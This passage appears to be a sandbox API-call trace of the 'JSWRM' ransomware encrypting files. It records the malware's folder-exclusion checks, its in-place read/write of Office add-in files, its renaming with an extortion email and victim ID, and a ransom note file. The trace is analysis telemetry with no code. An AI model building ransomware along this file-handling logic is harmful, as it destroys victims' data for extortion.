cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.088] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.088] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.088] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.088] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.088] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.088] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.088] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.088] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.088] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.089] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0126.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0126.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0126.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0126.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0126.089] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x164d461d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x164d461d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164d461d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7339, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="msjet.xsl", cAlternateFileName="")) returned 1 [0126.089] lstrcmpiW (lpString1="msjet.xsl", lpString2=".") returned 1 [0126.089] lstrcmpiW (lpString1="msjet.xsl", lpString2="..") returned 1 [0126.089] lstrcmpiW (lpString1="msjet.xsl", lpString2="...") returned 1 [0126.089] lstrcmpiW (lpString1="msjet.xsl", lpString2="windows") returned -1 [0126.089] lstrcmpiW (lpString1="msjet.xsl", lpString2="recovery") returned -1 [0126.089] lstrcmpiW (lpString1="msjet.xsl", lpString2="perflogs") returned -1 [0126.089] lstrcmpiW (lpString1="msjet.xsl", lpString2="documents and settings") returned 1 [0126.089] lstrcmpiW (lpString1="msjet.xsl", lpString2="$RECYCLE.BIN") returned 1 [0126.089] lstrcmpiW (lpString1="msjet.xsl", lpString2="system volume information") returned -1 [0126.089] lstrcmpiW (lpString1="msjet.xsl", lpString2="msocache") returned -1 [0126.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0126.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjet.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0126.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjet.xsl", cchWideChar=9, lpMultiByteStr=0x345e508, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msjet.xsl", lpUsedDefaultChar=0x0) returned 9 [0126.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0126.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0126.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjet.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0126.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjet.xsl", cchWideChar=9, lpMultiByteStr=0x345e4d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msjet.xsl", lpUsedDefaultChar=0x0) returned 9 [0126.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0126.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0126.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0126.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f1b0 [0126.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\msjet.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.091] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=29497) returned 1 [0126.091] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7330) returned 0x278330 [0126.091] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x7330, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x7330, lpOverlapped=0x0) returned 1 [0126.094] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.094] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x7330, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x7330, lpOverlapped=0x0) returned 1 [0126.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.094] CloseHandle (hObject=0x338) returned 1 [0126.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0126.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0126.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0126.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0126.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0126.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.095] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\msjet.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\msjet.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\msjet.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0126.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f1b0 | out: hHeap=0x1e0000) returned 1 [0126.096] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x164ae360, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x164ae360, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164ae360, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8a2a, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="orcl7.xsl", cAlternateFileName="")) returned 1 [0126.096] lstrcmpiW (lpString1="orcl7.xsl", lpString2=".") returned 1 [0126.096] lstrcmpiW (lpString1="orcl7.xsl", lpString2="..") returned 1 [0126.096] lstrcmpiW (lpString1="orcl7.xsl", lpString2="...") returned 1 [0126.096] lstrcmpiW (lpString1="orcl7.xsl", lpString2="windows") returned -1 [0126.096] lstrcmpiW (lpString1="orcl7.xsl", lpString2="recovery") returned -1 [0126.096] lstrcmpiW (lpString1="orcl7.xsl", lpString2="perflogs") returned -1 [0126.096] lstrcmpiW (lpString1="orcl7.xsl", lpString2="documents and settings") returned 1 [0126.096] lstrcmpiW (lpString1="orcl7.xsl", lpString2="$RECYCLE.BIN") returned 1 [0126.096] lstrcmpiW (lpString1="orcl7.xsl", lpString2="system volume information") returned -1 [0126.096] lstrcmpiW (lpString1="orcl7.xsl", lpString2="msocache") returned 1 [0126.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0126.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="orcl7.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0126.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="orcl7.xsl", cchWideChar=9, lpMultiByteStr=0x345e508, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="orcl7.xsl", lpUsedDefaultChar=0x0) returned 9 [0126.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0126.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0126.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="orcl7.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0126.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="orcl7.xsl", cchWideChar=9, lpMultiByteStr=0x345e4d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="orcl7.xsl", lpUsedDefaultChar=0x0) returned 9 [0126.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0126.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0126.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0126.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0126.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\orcl7.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\orcl7.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.098] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=35370) returned 1 [0126.098] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8a20) returned 0x278330 [0126.098] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x8a20, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x8a20, lpOverlapped=0x0) returned 1 [0126.101] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.101] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x8a20, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x8a20, lpOverlapped=0x0) returned 1 [0126.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.101] CloseHandle (hObject=0x338) returned 1 [0126.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0126.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0126.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0126.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0126.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0126.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.102] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\orcl7.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\orcl7.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\orcl7.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\orcl7.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0126.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0126.103] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x164ae360, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x164ae360, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164ae360, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x858c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="sql2000.xsl", cAlternateFileName="")) returned 1 [0126.103] lstrcmpiW (lpString1="sql2000.xsl", lpString2=".") returned 1 [0126.103] lstrcmpiW (lpString1="sql2000.xsl", lpString2="..") returned 1 [0126.103] lstrcmpiW (lpString1="sql2000.xsl", lpString2="...") returned 1 [0126.103] lstrcmpiW (lpString1="sql2000.xsl", lpString2="windows") returned -1 [0126.103] lstrcmpiW (lpString1="sql2000.xsl", lpString2="recovery") returned 1 [0126.103] lstrcmpiW (lpString1="sql2000.xsl", lpString2="perflogs") returned 1 [0126.103] lstrcmpiW (lpString1="sql2000.xsl", lpString2="documents and settings") returned 1 [0126.103] lstrcmpiW (lpString1="sql2000.xsl", lpString2="$RECYCLE.BIN") returned 1 [0126.103] lstrcmpiW (lpString1="sql2000.xsl", lpString2="system volume information") returned -1 [0126.103] lstrcmpiW (lpString1="sql2000.xsl", lpString2="msocache") returned 1 [0126.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0126.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql2000.xsl", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0126.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql2000.xsl", cchWideChar=11, lpMultiByteStr=0x345e508, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sql2000.xsl", lpUsedDefaultChar=0x0) returned 11 [0126.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0126.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0126.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql2000.xsl", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0126.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql2000.xsl", cchWideChar=11, lpMultiByteStr=0x345e4d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sql2000.xsl", lpUsedDefaultChar=0x0) returned 11 [0126.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0126.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0126.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0126.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0126.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.104] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=34188) returned 1 [0126.104] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8580) returned 0x278330 [0126.104] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x8580, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x8580, lpOverlapped=0x0) returned 1 [0126.107] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.107] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x8580, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x8580, lpOverlapped=0x0) returned 1 [0126.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.108] CloseHandle (hObject=0x338) returned 1 [0126.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0126.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: 